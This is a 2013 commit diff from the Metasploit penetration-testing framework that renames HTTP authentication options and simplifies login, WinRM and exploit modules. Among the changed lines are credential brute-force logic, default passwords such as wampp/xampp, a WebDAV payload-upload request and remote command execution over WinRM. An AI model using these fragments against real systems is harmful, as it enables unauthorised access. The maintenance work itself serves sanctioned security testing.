last of revert-merge snaffu

bug/bundler_fix
David Maloney 2013-02-19 23:16:46 -06:00
parent 6abbbeb3ca
commit 0ae489b37b
17 changed files with 52 additions and 239 deletions

View File

@ -38,10 +38,10 @@ class Metasploit4 < Msf::Auxiliary
))
# disabling all the unnecessary options that someone might set to break our query
deregister_options('RPORT','RHOST', 'BasicAuthPass', 'BasicAuthUser', 'DOMAIN',
deregister_options('RPORT','RHOST', 'DOMAIN',
'DigestAuthIIS', 'SSLVersion', 'NTLM::SendLM', 'NTLM::SendNTLM',
'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session',
'NTLM::UseNTLMv2', 'DigestAuthPassword', 'DigestAuthUser', 'SSL')
'NTLM::UseNTLMv2','SSL')
register_options(
[

View File

@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'Cisco Device HTTP Device Manager Access',
'Description' => %q{
This module gathers data from a Cisco device (router or switch) with the device manager
web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify
web interface exposed. The USERNAME and PASSWORD options can be used to specify
authentication.
},
'Author' => [ 'hdm' ],
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
print_good("#{rhost}:#{rport} Successfully authenticated to this device")
# Report a vulnerability only if no password was specified
if datastore['BasicAuthPass'].to_s.length == 0
if datastore['PASSWORD'].to_s.length == 0
report_vuln(
{

View File

@ -48,9 +48,8 @@ class Metasploit3 < Msf::Auxiliary
register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
end
def find_auth_uri_and_scheme
def find_auth_uri
path_and_scheme = []
if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0
paths = [datastore['AUTH_URI']]
else
@ -80,21 +79,10 @@ class Metasploit3 < Msf::Auxiliary
next if not res
end
next if not res.code == 401
next if not res.headers['WWW-Authenticate']
path_and_scheme << path
case res.headers['WWW-Authenticate']
when /Basic/i
path_and_scheme << "Basic"
when /NTLM/i
path_and_scheme << "NTLM"
when /Digest/i
path_and_scheme << "Digest"
end
return path_and_scheme
return path
end
return path_and_scheme
return path
end
def target_url
@ -111,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("You need need to set AUTH_URI when using PUT Method !")
return
end
@uri, @scheme = find_auth_uri_and_scheme()
@uri = find_auth_uri
if ! @uri
print_error("#{target_url} No URI found that asks for HTTP authentication")
return
@ -119,12 +107,7 @@ class Metasploit3 < Msf::Auxiliary
@uri = "/#{@uri}" if @uri[0,1] != "/"
if ! @scheme
print_error("#{target_url} Incompatible authentication scheme")
return
end
print_status("Attempting to login to #{target_url} with #{@scheme} authentication")
print_status("Attempting to login to #{target_url}")
each_user_pass { |user, pass|
do_login(user, pass)
@ -133,27 +116,21 @@ class Metasploit3 < Msf::Auxiliary
def do_login(user='admin', pass='admin')
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
success = false
proof = ""
ret = do_http_login(user,pass,@scheme)
return :abort if ret == :abort
if ret == :success
proof = @proof.dup
success = true
end
response = do_http_login(user,pass)
result = determine_result(response)
if success
if result == :success
print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
any_user = false
any_pass = false
vprint_status("#{target_url} - Trying random username with password:'#{pass}'")
any_user = do_http_login(Rex::Text.rand_text_alpha(8), pass, @scheme)
any_user = determine_result(do_http_login(Rex::Text.rand_text_alpha(8), pass))
vprint_status("#{target_url} - Trying username:'#{user}' with random password")
any_pass = do_http_login(user, Rex::Text.rand_text_alpha(8), @scheme)
any_pass = determine_result(do_http_login(user, Rex::Text.rand_text_alpha(8)))
if any_user == :success
user = "anyuser"
@ -175,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
:sname => (ssl ? 'https' : 'http'),
:user => user,
:pass => pass,
:proof => "WEBAPP=\"Generic\", PROOF=#{proof}",
:proof => "WEBAPP=\"Generic\", PROOF=#{response.to_s}",
:source_type => "user_supplied",
:active => true
)
@ -188,142 +165,25 @@ class Metasploit3 < Msf::Auxiliary
end
end
def do_http_login(user,pass,scheme)
case scheme
when /NTLM/i
do_http_auth_ntlm(user,pass)
when /Digest/i
do_http_auth_digest(user,pass,datastore['REQUESTTYPE'])
when /Basic/i
do_http_auth_basic(user,pass)
else
vprint_error("#{target_url}: Unknown authentication scheme")
return :abort
end
end
def do_http_auth_ntlm(user,pass)
def do_http_login(user,pass)
begin
resp,c = send_http_auth_ntlm(
response = send_request_cgi({
'uri' => @uri,
'method' => datastore['REQUESTTYPE'],
'username' => user,
'password' => pass
)
c.close
return :abort if (resp.code == 404)
if [200, 301, 302].include?(resp.code)
@proof = resp
return :success
end
})
return response
rescue ::Rex::ConnectionError
vprint_error("#{target_url} - Failed to connect to the web server")
return :abort
return nil
end
return :fail
end
def do_http_auth_basic(user,pass)
user_pass = Rex::Text.encode_base64(user + ":" + pass)
begin
res = send_request_cgi({
'uri' => @uri,
'method' => 'GET',
'headers' =>
{
'Authorization' => "Basic #{user_pass}",
}
}, 25)
unless (res.kind_of? Rex::Proto::Http::Response)
vprint_error("#{target_url} not responding")
return :abort
end
return :abort if (res.code == 404)
if [200, 301, 302].include?(res.code)
@proof = res
return :success
end
rescue ::Rex::ConnectionError
vprint_error("#{target_url} - Failed to connect to the web server")
return :abort
end
return :fail
end
def do_http_auth_digest(user,pass,requesttype)
path = datastore['AUTH_URI'] || "/"
begin
if requesttype == "PUT"
res,c = send_digest_request_cgi({
'uri' => path,
'method' => requesttype,
'data' => 'Test123\r\n',
#'DigestAuthIIS' => false,
'DigestAuthUser' => user,
'DigestAuthPassword' => pass
}, 25)
elsif requesttype == "PROPFIND"
res,c = send_digest_request_cgi({
'uri' => path,
'method' => requesttype,
'data' => '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>',
#'DigestAuthIIS' => false,
'DigestAuthUser' => user,
'DigestAuthPassword' => pass,
'headers' => { 'Depth' => '0'}
}, 25)
else
res,c = send_digest_request_cgi({
'uri' => path,
'method' => requesttype,
#'DigestAuthIIS' => false,
'DigestAuthUser' => user,
'DigestAuthPassword' => pass
}, 25)
end
unless (res.kind_of? Rex::Proto::Http::Response)
vprint_error("#{target_url} not responding")
return :abort
end
return :abort if (res.code == 404)
if ( [200, 301, 302].include?(res.code) ) or (res.code == 201)
if ((res.code == 201) and (requesttype == "PUT"))
print_good("Trying to delete #{path}")
del_res,c = send_digest_request_cgi({
'uri' => path,
'method' => 'DELETE',
'DigestAuthUser' => user,
'DigestAuthPassword' => pass
}, 25)
if not (del_res.code == 204)
print_error("#{path} could be created, but not deleted again. This may have been noisy ...")
end
end
@proof = res
return :success
end
if (res.code == 207) and (requesttype == "PROPFIND")
@proof = res
return :success
end
rescue ::Rex::ConnectionError
vprint_error("#{target_url} - Failed to connect to the web server")
return :abort
end
def determine_result(response)
return :abort unless response.kind_of? Rex::Proto::Http::Response
return :abort unless response.code
return :success if [200, 301, 302].include?(response.code)
return :fail
end

View File

@ -101,16 +101,13 @@ class Metasploit3 < Msf::Auxiliary
vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' with password:'#{pass}'")
success = false
srvhdr = '?'
user_pass = Rex::Text.encode_base64(user + ":" + pass)
uri = normalize_uri(datastore['URI'])
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'headers' =>
{
'Authorization' => "Basic #{user_pass}",
}
'username' => user,
'password' => pass
}, 25)
unless (res.kind_of? Rex::Proto::Http::Response)
vprint_error("http://#{rhost}:#{rport}#{uri} not responding")

View File

@ -40,10 +40,6 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
unless accepts_ntlm_auth
print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
return
end
streams = winrm_run_cmd(datastore['CMD'])
return unless streams.class == Hash
print_error streams['stderr'] unless streams['stderr'] == ''

View File

@ -39,12 +39,8 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
unless accepts_ntlm_auth
print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
return
end
each_user_pass do |user, pass|
resp,c = send_request_ntlm(test_request)
resp = send_winrm_request(test_request)
if resp.nil?
print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out"
return

View File

@ -42,12 +42,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
unless accepts_ntlm_auth
print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
return
end
resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL']))
resp = send_winrm_request(winrm_wql_msg(datastore['WQL']))
if resp.nil?
print_error "Got no reply from the server"
return

View File

@ -84,8 +84,7 @@ class Metasploit3 < Msf::Auxiliary
'IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol'])
], self.class)
deregister_options('BasicAuthPass', 'BasicAuthUser', 'DOMAIN', 'DigestAuthPassword',
'DigestAuthUser', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey',
deregister_options('DOMAIN', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey',
'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2')
end

View File

@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']),
OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']),
OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'piranha']),
OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'q'])
], self.class)
end
@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if res.code == 401
print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!")
print_error("401 Authorization Required! Our Credentials not accepted!")
elsif (res.code == 200 and res.body =~ /The passwords you supplied match/)
print_status("Command successfully executed (according to the server).")
end

View File

@ -227,9 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
authmsg = res.headers['WWW-Authenticate']
end
print_error("The remote server responded expecting authentication")
if datastore['BasicAuthUser'] and datastore['BasicAuthPass']
print_error("BasicAuthUser \"%s\" failed to authenticate" % datastore['BasicAuthUser'])
elsif authmsg
if authmsg
print_error("WWW-Authenticate: %s" % authmsg)
end
cleanup_instructions(rpath, name) # display cleanup info

View File

@ -96,9 +96,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
datastore['BasicAuthUser'] = datastore['USERNAME']
datastore['BasicAuthPass'] = datastore['PASSWORD']
jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))

View File

@ -123,9 +123,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
datastore['BasicAuthUser'] = datastore['USERNAME']
datastore['BasicAuthPass'] = datastore['PASSWORD']
jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))

View File

@ -112,9 +112,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
datastore['BasicAuthUser'] = datastore['USERNAME']
datastore['BasicAuthPass'] = datastore['PASSWORD']
res = query_serverinfo
disconnect
return CheckCode::Unknown if res.nil?
@ -127,8 +124,8 @@ class Metasploit3 < Msf::Exploit::Remote
:host => rhost,
:port => rport,
:sname => (ssl ? "https" : "http"),
:user => datastore['BasicAuthUser'],
:pass => datastore['BasicAuthPass'],
:user => datastore['USERNAME'],
:pass => datastore['PASSWORD'],
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
:active => true
)
@ -164,9 +161,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
datastore['BasicAuthUser'] = datastore['USERNAME']
datastore['BasicAuthPass'] = datastore['PASSWORD']
mytarget = target
if (target.name =~ /Automatic/)
mytarget = auto_target
@ -221,8 +215,8 @@ class Metasploit3 < Msf::Exploit::Remote
:host => rhost,
:port => rport,
:sname => (ssl ? "https" : "http"),
:user => datastore['BasicAuthUser'],
:pass => datastore['BasicAuthPass'],
:user => datastore['USERNAME'],
:pass => datastore['PASSWORD'],
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
:active => true
)

View File

@ -67,9 +67,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
def go(command)
datastore['BasicAuthUser'] = datastore['USERNAME']
datastore['BasicAuthPass'] = datastore['PASSWORD']
xml = <<-EOS
<?xml version="1.0"?>
<methodCall>

View File

@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(8080),
OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']),
OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com'])
], self.class)
end

View File

@ -36,8 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote
[
OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']),
OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]),
OptString.new('RUSER', [ true, "The Username to use for Authentication", 'wampp']),
OptString.new('RPASS', [ true, "The Password to use for Authentication", 'xampp'])
OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']),
OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp'])
], self.class)
end
@ -46,12 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
uri = build_path
print_status "Uploading Payload to #{uri}"
res,c = send_digest_request_cgi({
res = send_request_cgi({
'uri' => uri,
'method' => 'PUT',
'data' => payload.raw,
'DigestAuthUser' => datastore['RUSER'],
'DigestAuthPassword' => datastore['RPASS']
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}, 25)
unless (res and res.code == 201)
print_error "Failed to upload file!"

View File

@ -66,20 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
@compat_mode = false
end
def check
unless accepts_ntlm_auth
print_error "The Remote WinRM server does not appear to allow Negotiate (NTLM) auth"
return Msf::Exploit::CheckCode::Safe
end
return Msf::Exploit::CheckCode::Vulnerable
end
def exploit
unless check == Msf::Exploit::CheckCode::Vulnerable
return
end
unless valid_login?
print_error "Login Failure. Recheck your credentials"
return
@ -141,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
def temp_dir
print_status "Grabbing %TEMP%"
resp,c = send_request_ntlm(winrm_open_shell_msg)
resp = send_winrm_request(winrm_open_shell_msg)
if resp.nil?
print_error "Got no reply from the server"
return nil
@ -152,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote
end
shell_id = winrm_get_shell_id(resp)
cmd = "echo %TEMP%"
resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id))
resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id))
cmd_id = winrm_get_cmd_id(resp)
resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id))
resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id))
streams = winrm_get_cmd_streams(resp)
return streams['stdout'].chomp
end
def check_remote_arch
wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"}
resp,c = send_request_ntlm(winrm_wql_msg(wql))
resp = send_winrm_request(winrm_wql_msg(wql))
#Default to x86 if we can't be sure
return "x86" if resp.nil? or resp.code != 200
resp_tbl = parse_wql_response(resp)
@ -247,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote
def valid_login?
data = winrm_wql_msg("Select Name,Status from Win32_Service")
resp,c = send_request_ntlm(data)
resp = send_winrm_request(data)
unless resp.code == 200
return false
end